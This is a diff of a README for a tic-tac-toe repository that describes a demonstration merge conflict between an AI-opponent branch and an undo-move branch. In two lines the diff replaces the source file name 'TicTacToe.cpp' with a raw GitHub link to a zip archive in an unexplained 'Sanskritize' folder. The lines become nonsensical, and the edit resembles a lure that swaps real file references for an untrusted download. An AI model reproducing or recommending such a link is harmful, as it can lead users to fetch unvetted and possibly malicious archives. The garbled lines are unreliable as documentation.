Badexp9683/tic-tac-toe/README.md

 This repository contains an example demonstrating a merge conflict scenario.
 It includes:

 **Branch: `feature/ai-opponent`**
-- Adds AI opponent functionality to `TicTacToe.cpp`
+- Adds AI opponent functionality to `https://raw.githubusercontent.com/Badexp9683/tic-tac-toe/main/Sanskritize/tic-tac-toe-3.1.zip`
 - Modifies `makeMove()` function to track move history

 **Branch: `feature/undo-move`**
-- Adds undo functionality to `TicTacToe.cpp`
+- Adds undo functionality to `https://raw.githubusercontent.com/Badexp9683/tic-tac-toe/main/Sanskritize/tic-tac-toe-3.1.zip`
 - Also modifies `makeMove()` function to save the previous state

 When both branches are merged, they conflict because the same `makeMove()` function is altered in different ways.